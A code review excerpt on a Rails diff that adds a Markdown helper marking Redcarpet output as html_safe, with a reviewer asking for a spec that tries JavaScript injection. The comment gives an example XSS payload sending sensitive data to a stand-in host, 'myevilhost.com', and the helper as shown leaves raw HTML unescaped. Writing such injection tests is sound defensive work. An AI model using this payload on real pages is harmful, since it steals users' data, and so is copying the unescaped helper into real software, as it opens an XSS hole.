app/helpers/markdown_helper.rb

```diff
@@ -0,0 +1,12 @@
+module MarkdownHelper
+  def markdown(text)
+    markdown = Redcarpet::Markdown.new(Redcarpet::Render::HTML,
+                                       no_intra_emphasis: true,
+                                       fenced_code_blocks: true,
+                                       autolink: true,
+                                       tables: true,
+                                       underline: true,
+                                       highlight: true)
+    markdown.render(text).html_safe
```

Comment:
Yes, test as in spec. Try to inject some javascript into the page and verify that it is not rendered.

I.e.
```
<script>$.ajax('myevilhost.com', { data: sensitiveInformation })</script>
```